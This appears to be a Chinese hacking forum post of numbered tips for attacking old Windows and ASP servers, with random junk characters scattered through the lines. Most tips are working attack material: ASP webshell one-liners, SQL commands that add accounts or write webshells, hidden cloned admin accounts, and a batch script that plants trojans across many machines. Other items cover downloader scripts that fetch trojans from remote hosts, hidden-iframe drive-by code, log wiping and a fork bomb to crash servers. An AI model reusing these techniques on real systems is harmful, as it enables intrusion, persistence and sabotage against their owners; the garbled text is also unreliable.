Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
: Q1 U, @ ]- e/ ^# m$ gcacls C:\windows\system32 /G hqw20:R. X' d2 V) A7 w/ M
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入. h0 t0 G* b' [4 c2 ?8 R
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F2 M! E) X; A* c5 Y Y! l4 R4 j: F
6 j/ V/ x! T5 d2 ~% G0 m8 u& l2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
% q; J3 N2 M) r/ O4 I6 z9 `5 g/ ~6 ?6 E6 U( c9 m& R' i C0 j0 }
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。. b4 a2 q3 x2 q7 Z3 G T) d' E
0 E6 W9 A: n7 T
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
0 I! e) T$ f# ?- {* z$ M! P1 k+ f# u! e$ W
5、利用INF文件来修改注册表$ G1 ?+ T |% N7 }- t
[Version]; B0 C/ `( U5 {
Signature="$CHICAGO$"7 A0 V: ]0 V& s# X3 I" ^
[Defaultinstall]
1 k5 s1 h1 I* Y7 v" qaddREG=Ating
& G& P `! V$ E4 b; x2 S& A[Ating]
. p+ ?# L9 e: ?8 ZHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
( A8 ?$ P9 v6 {0 g以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
+ E6 t& r2 ]9 Lrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径+ B" d6 n4 e4 s) L5 W& H
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
* _7 \4 q1 s7 T' G# U5 n( u! VHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
. ], R& m1 Q" g( BHKEY_CURRENT_CONFIG 简写为 HKCC' E. d) }, B9 U# Y! p8 v
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值 y1 ` v8 [7 h+ d5 ]# P( f* P5 B- V
"1"这里代表是写入或删除注册表键值中的具体数据
7 l* r8 h! s& x. a; d
7 \" V2 q& A! e% L% V6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,6 w) g/ N" L4 V' u$ f
多了一步就是在防火墙里添加个端口,然后导出其键值
* o' P! l* \2 h# q[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
' }0 d+ ^5 e2 A& u9 w3 c1 a/ D5 @, W h
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽5 W2 T3 v# V$ G+ v; u
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。& ^2 h& ^9 k6 J5 }5 D7 J4 p
. L1 y# B- M5 q8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
. [8 r8 S c1 d/ T- y5 L4 a6 \" \0 C6 V3 C' |4 ?2 T
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
]: B% v3 }1 @+ `& r6 I可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
5 J8 G- B" I7 O& X' ?, r
: o& z5 y: ?% H+ a+ E+ k( I9 ~10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”' \7 `& [; ~+ m. w0 |: n/ o
8 z2 ]$ d. b6 D
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
* \7 Q4 r2 _6 ~# W n1 ^5 {; Y# V6 t用法:xsniff –pass –hide –log pass.txt* ?' D) E* l5 o5 A
- U, ^2 f; g: I+ N/ x. T6 P12、google搜索的艺术! b) t/ a) A3 m1 Y9 N/ O
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”5 p$ |' r* K4 H) C$ b
或“字符串的语法错误”可以找到很多sql注入漏洞。
9 M' T) E1 t. ~" O) u- g) [0 |. |& c; k+ k( _0 Y' s
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
: Y* Z0 s" d4 @9 ^) }/ ]9 q3 T- Y$ ^" R9 S5 \( q
14、cmd中输入 nc –vv –l –p 1987" E9 T' o' R) v+ N
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
+ Z' @# H& h6 |9 y3 s8 E( i2 s, U p+ j H- N
15、制作T++木马,先写个ating.hta文件,内容为
# _8 {, ]6 H3 b; ?<script language="VBScript">0 J# F+ _3 X& B, K6 b5 u' g% a
set wshshell=createobject ("wscript.shell" )7 G7 W9 U- r) Y7 t' q
a=wshshell.run("你马的名称",1)* p( I* ^& p; ]5 ~/ g
window.close R# ?8 c2 `# H6 r) _2 k
</script>" T7 f: F$ v L6 x6 B- m3 O
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
2 n, @9 k! k+ z2 F8 i% C( s" R4 A/ D# [! |5 H) Y
16、搜索栏里输入0 F9 u! _# Z! j6 J* ?
关键字%'and 1=1 and '%'='/ d9 H6 D$ z1 ^6 M9 G. D* f
关键字%'and 1=2 and '%'='& E/ J- O8 R& g
比较不同处 可以作为注入的特征字符4 B5 s" Q2 Q( Y
5 R1 ~; q& E1 F$ D9 N# {
17、挂马代码<html>
+ f' n, w7 R& J<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>& l5 c5 c+ E$ ]* X5 h
</html>5 T t6 M }8 }' H1 |$ t
2 ^- R' q" a( x& S" h
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
0 n! _/ A# C0 n, [! e7 p, Hnet localgroup administrators还是可以看出Guest是管理员来。
: U# l+ s! a% H/ Y/ O, _# @
, F m1 }3 ^- q$ `" b19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
% D% }8 a1 a" ~6 Z3 s4 G用法: 安装: instsrv.exe 服务名称 路径) ]0 l& t$ f0 Y7 U4 [8 i8 U
卸载: instsrv.exe 服务名称 REMOVE
' t+ o( M1 S$ p' D$ r( U! N
+ c7 K7 a0 L/ j8 O; ^4 s( q* H) W9 I! \! U% q5 b5 n; N! Q
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉! H3 n- S- c& t$ o! E0 C
不能注入时要第一时间想到%5c暴库。. S& Q7 @3 z/ I8 J
' I; R- V. i- B6 G H* e22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
7 e( D9 r8 X% H
: h) P$ Q5 H1 q2 V23、缺少xp_cmdshell时
1 r) ]4 B$ a$ G; x: a7 c尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'& l" k# z( ]$ w. d# S( w) c
假如恢复不成功,可以尝试直接加用户(针对开3389的)
' X$ L. m5 k" l0 w2 tdeclare @o int
% `* O( Y/ J- [7 I+ a6 `. _; kexec sp_oacreate 'wscript.shell',@o out: U* S$ ^( y: x9 F' ^, a
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
. W3 ]( f+ {# h& [
3 n' i7 P1 G7 J, ~# E/ @* W4 k/ Q24.批量种植木马.bat
: b' O: w2 Z; R( k) sfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
4 C+ {% ^3 O8 g# @for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间# e: a9 X/ V0 M9 l; ?0 Y5 D
扫描地址.txt里每个主机名一行 用\\开头
+ _# D( Z8 E7 M; K
! M' ]; b z, D) C25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。& q# ^( D/ G. `( q) h: `/ i
# W9 Z; e" p# ]0 H& J, I5 K
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.+ J: d5 \6 W8 G9 n& B( V) p
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下., ? ^0 I+ s: S( }4 A
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
( j/ j( V* j1 {: \6 I' ]# A3 Z4 c3 O+ |: Z+ b U" {+ j
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP7 G) ~ {. h1 U6 R3 i; Z
然后用#clear logg和#clear line vty *删除日志* d- N! @- Q) p+ f
/ E1 D6 u5 z g- X3 c
28、电脑坏了省去重新安装系统的方法
, y$ u. J1 B( m! ? Q7 `纯dos下执行,
3 d0 |, H w6 ]. C1 oxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config$ g7 S2 D3 V: S
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config% x% `. |; U/ L# d0 j
. G8 |( g; L7 D ~" J29、解决TCP/IP筛选 在注册表里有三处,分别是:* `3 P/ }' ?: @- l8 X
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip8 L+ Z( f# |' u l6 q1 {8 [. Z
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip2 W8 P( y, |- h' @% z
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip! X# y6 P' ~! J5 U, Y h
分别用 U) _' t. i- \. i0 f0 P! @/ {
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
?# H, n( J5 C* O* W' }% I( f8 A+ Qregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
3 n- Q; _- y. Mregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip5 N' o% c3 c, }$ p
命令来导出注册表项) @4 w; C: b$ B" O( n3 H S
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
: L2 s; O0 B5 \2 _: V* _* E! a0 x; o6 ^改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用0 o8 d& J6 H% V2 }' Z/ G) c& i7 k
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。8 t: l; q0 i: @
+ |# Y! V9 l3 t6 K
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U( S6 k+ t$ m9 s' P0 Q
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的34 \% j5 z& F' W- g+ u
& n& I U& ~- m4 }" f6 e; B3 H! }31、全手工打造开3389工具
0 @: T: M% o8 _打开记事本,编辑内容如下:2 j: h* s" n# _$ g
echo [Components] > c:\sql
$ t% f. _1 I7 [! r6 F4 Necho TSEnable = on >> c:\sql! f) S g) c1 G. D8 g
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q7 l0 k& ]+ T( J" I7 g* p- q2 l
编辑好后存为BAT文件,上传至肉鸡,执行) |$ M0 s7 }: x8 N6 Z2 ^% g8 u
. E" p- X+ `) m7 V- E ^5 B8 v+ U' R
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
& w0 T* h2 F# f$ H
' V* z7 E1 H! G X* U, k33、让服务器重启
* k; H8 n$ ]3 g1 h) z6 @$ O写个bat死循环:
" |% ~4 f: ~2 E@echo off
9 n& l8 q/ d& F- {: O5 i1 T) u:loop16 [5 z; [7 r7 H- A& U: P9 D: b
cls
* Z9 \- R' s3 b O& w G- {start cmd.exe0 i. V6 {1 z8 t
goto loop11 I( T C1 f" P
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启3 \* ~+ o/ w" {& E+ w6 J/ Y' P
7 |* R9 s S, @ B. v) m34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,3 _* w2 ^ K7 v; o: q w: {, [/ j
@echo off
" m. P/ O& Z! N4 P% b, X, ydate /t >c:/3389.txt
: @+ O1 c2 o* T# R) S8 ltime /t >>c:/3389.txt: K- [) A* i$ i. F$ U
attrib +s +h c:/3389.bat
4 ^3 X% |) N# R9 g1 z" `. A; ~attrib +s +h c:/3389.txt
' ^ T! G: T5 U- |netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt/ x0 S% t' N& A# F, r
并保存为3389.bat
. j3 ~/ G) n* Y2 w7 H( \% a打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号9 c! R$ _. e6 r# R' [, n! D
/ J* j8 e3 g2 t* u! }% @! L1 |35、有时候提不了权限的话,试试这个命令,在命令行里输入:% t& s2 o0 R6 R W( S5 Z6 R4 L
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
* B. U; x1 k; t# e7 q输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。. q8 c9 } g5 _ i! S
9 s S5 _; n& G, N36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件 o% |; C& |6 z
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
! C5 T; M* u- G' aecho 你的FTP账号 >>c:\1.bat //输入账号0 h2 _" b0 N0 L* n+ Y
echo 你的FTP密码 >>c:\1.bat //输入密码
! h! I- ~0 |: l P& g& [ Fecho bin >>c:\1.bat //登入
' q& `4 h$ I% _1 o0 ^" E+ _' eecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
. ?( O/ W# [! v( q0 S3 oecho bye >>c:\1.bat //退出; o; B6 O7 ~ I/ ?5 ~ j4 U' e
然后执行ftp -s:c:\1.bat即可+ H o6 V1 R2 A" ~+ P
! ^! `' `; T" o, r1 W- `: B
37、修改注册表开3389两法' ^* G8 g$ y1 q- v0 E; G* d
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
6 r8 X9 `$ m1 J* qecho Windows Registry Editor Version 5.00 >>3389.reg
* S& z. n/ I4 G' Becho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg3 n" P5 ~# L; K$ R. r
echo "Enabled"="0" >>3389.reg
% ?+ ], E8 y/ M0 n- {! A/ hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
- k0 F) M9 p f5 L6 D1 K0 o! \NT\CurrentVersion\Winlogon] >>3389.reg
6 \; o7 s# @5 R( K! c& a$ |, Fecho "ShutdownWithoutLogon"="0" >>3389.reg# [) i! e+ f/ o. J/ w6 ~! f. A# G
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]% `" U" p# d1 x7 E, @" |) y
>>3389.reg# J7 y! C) V% K S* ~8 }2 l# y
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
% I/ n4 w/ a( f7 aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]0 H0 ?5 I- V# m, g
>>3389.reg
2 E* p9 y0 f" wecho "TSEnabled"=dword:00000001 >>3389.reg7 p5 P! S9 p7 L! I6 h8 _) F
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
9 \& {4 Z$ ]7 E. V1 cecho "Start"=dword:00000002 >>3389.reg+ }; @1 j3 Q2 x# u# Z) l/ T
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]; | I |8 I8 e+ C
>>3389.reg/ I: f4 v8 F1 s. E. u, {4 D
echo "Start"=dword:00000002 >>3389.reg
5 h/ ^9 Z& T# necho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
9 j. f4 \- [% a- t. h- Q. Hecho "Hotkey"="1" >>3389.reg% A3 H# o \0 n+ i; x! Y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal4 Q6 d; v! T8 i# v! B J0 P
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
8 M( p2 B2 p( Q9 i. I# j6 aecho "PortNumber"=dword:00000D3D >>3389.reg1 j; v& q* r. i8 m5 h
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
: _8 V% o [7 R. m- aServer\WinStations\RDP-Tcp] >>3389.reg* r/ s; g E6 H# W* x
echo "PortNumber"=dword:00000D3D >>3389.reg
0 |: o" \8 C" ?5 F! J, Y+ U8 h把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
1 @) c* C+ C J2 k j(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
8 h( o* h1 J4 H9 `因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效+ f3 L ?* D$ b! \/ Z
(2)winxp和win2003终端开启: H* F& u2 F/ @
用以下ECHO代码写一个REG文件:
_, z$ e! S% ^* ]+ O% lecho Windows Registry Editor Version 5.00>>3389.reg
# O8 |4 p+ a! p! y2 v8 S) @! Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- J: C+ U# F% X5 c% _1 lServer]>>3389.reg
3 r+ i- ^% a3 U# P2 m& b: ?* uecho "fDenyTSConnections"=dword:00000000>>3389.reg! l% {8 u/ }% w% F2 o! o' [
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal; u1 z% L, c7 e; B% x! {2 X" U/ h0 A
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
' t( c: N* [7 X; b7 lecho "PortNumber"=dword:00000d3d>>3389.reg5 }* y) l5 V! G+ f6 ^; Q
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 Q+ z; N2 B# u3 p5 o$ O
Server\WinStations\RDP-Tcp]>>3389.reg
+ Y7 C/ U7 a8 A, S5 F% b; Techo "PortNumber"=dword:00000d3d>>3389.reg
- g9 D) ~! g7 ]; ^然后regedit /s 3389.reg del 3389.reg7 V7 Y7 G$ G9 B# x% }9 z
XP下不论开终端还是改终端端口都不需重启
( |: `! z5 j2 p1 k1 K
+ i. J) U# @7 X9 G38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃7 a$ n' n8 H: \: u# @
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'1 _6 x" i. j- ? F0 s- X
# F& y i6 T8 F- Q
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
- R' A {4 k8 @(1)数据库文件名应复杂并要有特殊字符
4 R) _5 ~: s% J0 l5 S(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
5 Q4 s( ~3 {: k* Q将conn.asp文档中的
$ r! i! ^% y" l+ \DBPath = Server.MapPath("数据库.mdb")
* |+ |5 X( x9 y/ ]" yconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
9 f) Y4 d* Z" ?7 T8 z
( u. O; s `9 P9 h" M# J& e5 W& o修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置 ~0 u; p0 y: {6 P. {! u' x
(3)不放在WEB目录里+ W% M0 S; g& b5 q
, S( d" J" T0 d$ z40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉) o. V/ |, g2 P2 a3 m1 Q
可以写两个bat文件9 c! c: ~! u! }4 |* P( v. V- U
@echo off
8 x+ l- S( `; m/ Y7 Y) U@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
$ A. x' Y$ e& C6 p" F@del c:\winnt\system32\query.exe
" [" `5 C- p) i( d@del %SYSTEMROOT%\system32\dllcache\query.exe; n5 K; j; m9 a! A- A3 B
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的; C1 M2 ^ T6 m! }
0 j% Z0 y( a6 r( t- c* I
@echo off
7 Q( N" K5 p5 x@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe! z- l7 k: ?' W& A. I
@del c:\winnt\system32\tsadmin.exe) @( Q+ z: O$ n* K, X- I
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
' K T6 Q; w x- z7 m1 \ q! ]6 X+ Y" z- k7 C
41、映射对方盘符+ A( {% Q) m2 D9 g+ T6 X, ~/ n6 `
telnet到他的机器上,+ z( q( P" g6 C: Q D5 W. R* K& s% e4 g
net share 查看有没有默认共享 如果没有,那么就接着运行& p' F# T" V- H
net share c$=c:. v1 ?, x( k0 e
net share现在有c$! ?$ t% o$ a- Y6 x T, G( {
在自己的机器上运行% y" r" G+ g( u. J5 ^
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K! ~# A4 y, H* u
# o5 V" Q. W6 _: K. h42、一些很有用的老知识
, e/ w. F1 [* p3 {8 T9 g5 `& i4 ?* G1 Dtype c:\boot.ini ( 查看系统版本 ). d% }, s$ {4 E. ~" N! c9 O
net start (查看已经启动的服务)
; u1 a* w& g$ A3 O: b; {& oquery user ( 查看当前终端连接 )+ G+ M* O/ D" E+ {8 e7 k2 t* y. {
net user ( 查看当前用户 )
- ^& p9 L) b5 R- J; hnet user 用户 密码/add ( 建立账号 )
" @0 H/ l$ Q( D0 ~net localgroup administrators 用户 /add (提升某用户为管理员)$ Q+ B4 s$ P! `8 g
ipconfig -all ( 查看IP什么的 )
$ L& l, b" l, o+ ynetstat -an ( 查看当前网络状态 )
8 |# k4 r$ `" c+ Zfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)) b! \5 v) z! K3 O! g
克隆时Administrator对应1F4
& m6 w$ ?9 X8 }" h1 jguest对应1F5
" ^2 ~& p/ S. z- s# ztsinternetuser对应3E8
- Z6 _, B4 t* z/ U1 F
" S Y, u, C" p7 G1 E7 m43、如果对方没开3389,但是装了Remote Administrator Service
0 C1 j; }2 e( T用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
U- K) _* r5 B, V* K解释:用serv-u漏洞导入自己配制好的radmin的注册表信息% B0 R8 x3 `7 j
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"+ ?( `5 `1 }% z# I
3 C" Y9 S: X7 c% B1 t44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)4 D2 L- ?$ |5 H0 r( D7 u* t" f
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)+ L* M3 N* }! G
# C+ x0 w8 y1 W1 h7 V$ y+ Y4 p
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)2 Y/ z" ^3 ]( E. x+ l; M5 g
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open) w% r& k3 B; m" [0 r
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
, ]) w0 T1 p$ d- b( |6 x. R6 ?CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =! F2 t/ U R; A( s7 e# ^" a* v
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
6 W1 S d2 S5 ^8 c% X' Z& v3 r(这是完整的一句话,其中没有换行符)
0 ]+ Z }8 ?$ b. Y5 `: m. O9 _然后下载:1 E1 g7 v% H1 d9 B' W6 k c
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
, @* H: U& G' E: S: q7 M: ]
7 _7 u+ u: V# I. R. Z$ I2 q, y46、一句话木马成功依赖于两个条件:$ q/ f3 n) v8 X- |/ q( D
1、服务端没有禁止adodb.Stream或FSO组件2 G1 z9 c; P) ]/ b0 |' ]
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。6 o/ y4 j G5 X4 g% J! N4 K
1 f& f5 q9 }! A& n$ {47、利用DB_OWNER权限进行手工备份一句话木马的代码:
' M' T4 j3 e4 X0 a;alter database utsz set RECOVERY FULL--
- X7 r5 e |+ n2 k5 j: ^ |1 ];create table cmd (a image)--
: x! b+ n) Y% ]8 S6 Z# R;backup log utsz to disk = 'D:\cmd' with init--
) s6 G) l4 k! v;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
2 d: Y c5 H8 I4 Y) s' a;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
9 u8 T2 |! ~+ I) z( Y; F* c0 ^1 _注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。% Q- f: w; b8 v! G( J7 v0 `7 O" ~
2 a' ?4 R/ L- ]5 Z48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
* U* e9 S' n7 _2 O1 G3 c: F" d8 f6 m/ |/ l
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options' x( e. P. u7 ^1 I- z
所有会话用 'all'。
" Q+ x& `# s; G7 A3 q-s sessionid 列出会话的信息。% H- d) |: Y8 u6 D0 D6 l" C9 d( [
-k sessionid 终止会话。
% ?0 f* `/ s" c+ A0 U4 ~-m sessionid 发送消息到会话。: G8 D6 M2 N, O" D/ |2 J
* p9 ^* I( H1 R! D- x
config 配置 telnet 服务器参数。
2 b @ Z# u) [, I# C
9 a$ ~; L5 p: w7 x8 C0 U4 F6 O7 a* \common_options 为:
! S+ I. t; } u5 s/ G0 d& H1 j% H-u user 指定要使用其凭据的用户# D' x" n& v/ P- _+ x1 Z8 V! w
-p password 用户密码
% }" @4 ] b5 N) n3 B1 K$ E# |6 y, `5 H7 i
config_options 为:( }8 Y2 a$ v+ I$ j
dom = domain 设定用户的默认域3 W) _; H& k- G8 ^- K6 M
ctrlakeymap = yes|no 设定 ALT 键的映射7 W# F" b% \" b4 k( d( D
timeout = hh:mm:ss 设定空闲会话超时值
; i5 x- z( Z" F8 j& x& t3 otimeoutactive = yes|no 启用空闲会话。3 A, x3 i/ i0 x4 k
maxfail = attempts 设定断开前失败的登录企图数。% l" t! H$ g# U; J6 v9 D& T
maxconn = connections 设定最大连接数。/ f; O8 i2 o8 ~
port = number 设定 telnet 端口。0 _# o* p$ R8 j2 U7 ]
sec = [+/-]NTLM [+/-]passwd9 W' J7 ^# ]' v; c( F" Z' v
设定身份验证机构
9 c/ n- E- V3 cfname = file 指定审计文件名。
, R S1 H" u; N; Rfsize = size 指定审计文件的最大尺寸(MB)。. a6 k. U# G9 N4 s
mode = console|stream 指定操作模式。3 n* H; [* D' R; w3 H1 @& c4 l" Q
auditlocation = eventlog|file|both4 o6 s6 F; I" m4 o
指定记录地点6 ]3 ~8 y$ V& e* \
audit = [+/-]user [+/-]fail [+/-]admin" ~: o6 O, a. p- b7 C; ?, x
$ \% o- o. K6 y, K
49、例如:在IE上访问:
1 B" x) z6 o) zwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
: r# t7 Q) m( ?0 I% b3 m) ghack.txt里面的代码是:8 F2 O' L1 ~ a( @( I
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
7 R0 @: Z! S: \4 |' r把这个hack.txt发到你空间就可以了!: A& V! R: G/ i7 Q( J# T' f* `% m
这个可以利用来做网马哦!( ^5 m5 q2 C6 L% X# w) |; G
- M7 K1 v+ h# {0 s50、autorun的病毒可以通过手动限制!- s# q6 {5 N* |# o/ d% `( w
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
7 b* k) K: E- U. V4 g$ E2,打开盘符用右键打开!切忌双击盘符~
8 h2 x; f+ @+ p" u3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!7 {, r7 q# ?' l# X; x
: [8 O4 A, L: U( k3 ]% b6 O9 i
51、log备份时的一句话木马:
+ d f, w% E0 U+ r0 U; Ma).<%%25Execute(request("go"))%%25>* a7 M2 v' [ f: |8 n( J+ z- |
b).<%Execute(request("go"))%>* z/ ^1 k0 |. d: O3 D8 q0 w2 t$ e
c).%><%execute request("go")%><%/ f D; x; ~& h1 I. n
d).<script language=VBScript runat=server>execute request("sb")</Script>
" e3 I: M1 ]$ B$ F2 o3 pe).<%25Execute(request("l"))%25>8 l: t' \ R: N
f).<%if request("cmd")<>"" then execute request("pass")%>
1 t7 v) @3 r. J* U k- A8 y! ]4 l, k+ _
52、at "12:17" /interactive cmd
- a( W: V4 A K2 p) j执行后可以用AT命令查看新加的任务
& u4 q: b+ p+ i6 w0 D# R用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
